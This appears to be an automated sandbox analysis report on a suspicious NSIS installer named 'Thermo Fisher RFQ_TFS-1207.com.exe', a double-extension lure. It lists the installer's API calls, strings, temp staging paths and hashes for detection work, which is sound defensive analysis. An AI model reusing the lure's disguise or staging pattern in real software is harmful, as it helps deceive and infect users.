Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"$1012$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards$C:\Users\user\Desktop$C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-4245427026
Opcode ID: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
Instruction ID: 93f5a648143c5b163d48a65c291177ce643c8a453b959a17227cb1525d46e2db
Opcode Fuzzy Hash: 4539d7b49e661c335d86d711c7dc70c0ceacb82e8b10bfdaa1b9f15d78561598
Instruction Fuzzy Hash: 2CF10370604301AAD720AF659D05B2B7EE8EF85706F00483EF581B62D2DB7DDA45CB6E

Function 00405718 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405776
GetDlgItem.USER32(?,000003EE), ref: 00405785
GetClientRect.USER32(?,?), ref: 004057C2
GetSystemMetrics.USER32(00000002), ref: 004057C9
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057EA
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FB
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040580E
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581C
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040582F
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405851
ShowWindow.USER32(?,?), ref: 00405865
GetDlgItem.USER32(?,000003EC), ref: 00405886
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405896
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058AF
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BB
GetDlgItem.USER32(?,000003F8), ref: 00405794

Part of subcall function 00404508: SendMessageW.USER32(?,?,00000001,00404333), ref: 00404516

GetDlgItem.USER32(?,000003EC), ref: 004058D8
CreateThread.KERNELBASE(00000000,00000000,Function_000056AC,00000000), ref: 004058E6
CloseHandle.KERNELBASE(00000000), ref: 004058ED
ShowWindow.USER32(00000000), ref: 00405911
ShowWindow.USER32(?,?), ref: 00405916
ShowWindow.USER32(?), ref: 00405960
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405994
CreatePopupMenu.USER32 ref: 004059A5
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059B9
GetWindowRect.USER32(?,?), ref: 004059D9
TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004059F2
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2A
OpenClipboard.USER32(00000000), ref: 00405A3A
EmptyClipboard.USER32 ref: 00405A40
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4C
GlobalLock.KERNEL32(00000000), ref: 00405A56
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6A
GlobalUnlock.KERNEL32(00000000), ref: 00405A8A
SetClipboardData.USER32(0000000D,00000000), ref: 00405A95
CloseClipboard.USER32 ref: 00405A9B

Strings

{, xrefs: 0040597E

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
Instruction ID: d944e331103d7d797bb7559e04b2c0af071990b1bd98ce6caf222631f3d5da7c
Opcode Fuzzy Hash: 245d7c75552d93292a5d0639f3ad285b68bcb815a2f70b75041fbe35360c6243
Instruction Fuzzy Hash: 47B13971900608FFDB11AF60DD85EAE7B79FB48354F10813AFA41B61A0CB788A51DF68

Function 6FE71BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6FE712BB: GlobalAlloc.KERNELBASE(?,?,6FE712DB,?,6FE7137F,00000019,6FE711CA,-000000A0), ref: 6FE712C5

GlobalAlloc.KERNELBASE(?,00001CA4), ref: 6FE71D2D
lstrcpyW.KERNEL32(00000008,?), ref: 6FE71D75
lstrcpyW.KERNEL32(00000808,?), ref: 6FE71D7F
GlobalFree.KERNEL32(00000000), ref: 6FE71D92
GlobalFree.KERNEL32(?), ref: 6FE71E74
GlobalFree.KERNEL32(?), ref: 6FE71E79
GlobalFree.KERNEL32(?), ref: 6FE71E7E
GlobalFree.KERNEL32(00000000), ref: 6FE72068
lstrcpyW.KERNEL32(?,?), ref: 6FE72222
GetModuleHandleW.KERNEL32(00000008), ref: 6FE722A1
LoadLibraryW.KERNEL32(00000008), ref: 6FE722B2
GetProcAddress.KERNEL32(?,?), ref: 6FE7230C
lstrlenW.KERNEL32(00000808), ref: 6FE72326

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 1269ecf447a17c84c949701b5d075142466cbccc3cde0d98be5475642a63ec88
Instruction ID: 612b436ee87c1d6b1cacb0ebf0b3ad5f85847a2549e5bbdafeb9494aeec7a526
Opcode Fuzzy Hash: 1269ecf447a17c84c949701b5d075142466cbccc3cde0d98be5475642a63ec88
Instruction Fuzzy Hash: 27227A71D08746DADB248FF889906EDBFB0FF05319F30462ED165A6280DB78A682CF51

Function 00405C60 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405C89
lstrcatW.KERNEL32(007A3750,\*.*,007A3750,?,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405CD1
lstrcatW.KERNEL32(?,0040A014,?,007A3750,?,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405CF4
lstrlenW.KERNEL32(?,?,0040A014,?,007A3750,?,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405CFA
FindFirstFileW.KERNEL32(007A3750,?,?,?,0040A014,?,007A3750,?,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405D0A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAA
FindClose.KERNEL32(00000000), ref: 00405DB9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C6D
\*.*, xrefs: 00405CCB
"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe", xrefs: 00405C69
P7z, xrefs: 00405CB9

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"$C:\Users\user\AppData\Local\Temp\$P7z$\*.*
API String ID: 2035342205-2058490772
Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE

Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040224E

Strings

C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards, xrefs: 0040228E

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical\Surfboards
API String ID: 542301482-1958581672
Opcode ID: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
Instruction ID: d027746e191c14b49f1eee61a42344c893d98f4f720128a79e15815c221bbdc7
Opcode Fuzzy Hash: 2e4948e65c7aa6382ef10f5b335c56c6e17f10fa883873382e07b1eafca896d3
Instruction Fuzzy Hash: 3B411675A00209AFCB00DFE4C989AAD7BB5FF48318B20457EF505EB2D1DB799981CB54

Function 004068B1 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(75F03420,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
FindClose.KERNEL32(00000000), ref: 004068C8

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8

Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
Instruction ID: bedb772ef0a2f17f15cc30cd16f16fd49c67dd7be69949238e740b54367540b4
Opcode Fuzzy Hash: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
Instruction Fuzzy Hash: 08F0E231A04100EAD700EBA4DA499AEB374FF04314F20417BE101F30E0D7B84D409B2D

Function 00403FD4 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
ShowWindow.USER32(?), ref: 00404030
GetWindowLongW.USER32(?,?), ref: 00404042
ShowWindow.USER32(?,?), ref: 0040405B
DestroyWindow.USER32 ref: 0040406F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404088
GetDlgItem.USER32(?,?), ref: 004040A7
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
IsWindowEnabled.USER32(00000000), ref: 004040C2
GetDlgItem.USER32(?,00000001), ref: 0040416D
GetDlgItem.USER32(?,00000002), ref: 00404177
SetClassLongW.USER32(?,000000F2,?), ref: 00404191
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E2
GetDlgItem.USER32(?,00000003), ref: 00404288
ShowWindow.USER32(00000000,?), ref: 004042A9
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BB
EnableWindow.USER32(?,?), ref: 004042D6
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EC
EnableMenuItem.USER32(00000000), ref: 004042F3
SendMessageW.USER32(?,?,00000000,00000001), ref: 0040430B
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
SetWindowTextW.USER32(?,007A1748), ref: 0040435C
ShowWindow.USER32(?,0000000A), ref: 00404490

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E

Function 00403C26 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,?,?,0040363F,?,?,?,?,?,?,?,?,?), ref: 0040695A
Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?), ref: 00406975

lstrcatW.KERNEL32(1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75F03420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",00008001), ref: 00403CA7
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75F03420), ref: 00403D27
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
GetFileAttributesW.KERNEL32(Call), ref: 00403D45
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical), ref: 00403D8E

Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8

RegisterClassW.USER32(007A7200), ref: 00403DCB
SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403DE3
CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E18
ShowWindow.USER32(00000005,00000000), ref: 00403E4E
GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
RegisterClassW.USER32(007A7200), ref: 00403E90
DialogBoxParamW.USER32(?,00000000,00403FD4,00000000), ref: 00403EAF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2B
C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical, xrefs: 00403CB6, 00403CBE, 00403D61, 00403D67, 00403D77
.DEFAULT\Control Panel\International, xrefs: 00403C92
.exe, xrefs: 00403D34
"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe", xrefs: 00403C29
Call, xrefs: 00403CEE, 00403CF7, 00403D05, 00403D54, 00403D5A
RichEdit20W, xrefs: 00403E72, 00403E78
1033, xrefs: 00403C46, 00403CA2
_Nb, xrefs: 00403DAA, 00403E12
RichEd32, xrefs: 00403E62
RichEd20, xrefs: 00403E54
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5A
RichEdit, xrefs: 00403E81

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-4038127305
Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

Function 004030A2 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030B3
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,00000400), ref: 004030CF

Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00406048
Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 0040311B
GlobalAlloc.KERNELBASE(?,?), ref: 00403251

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9
Null, xrefs: 00403199
soft, xrefs: 00403190
;, xrefs: 004031A8, 00403205
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe", xrefs: 004030A8
Error launching installer, xrefs: 004030F2
Inst, xrefs: 00403187
;, xrefs: 00403123
C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe, xrefs: 004030B9, 004030C8, 004030DC, 004030FC
C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

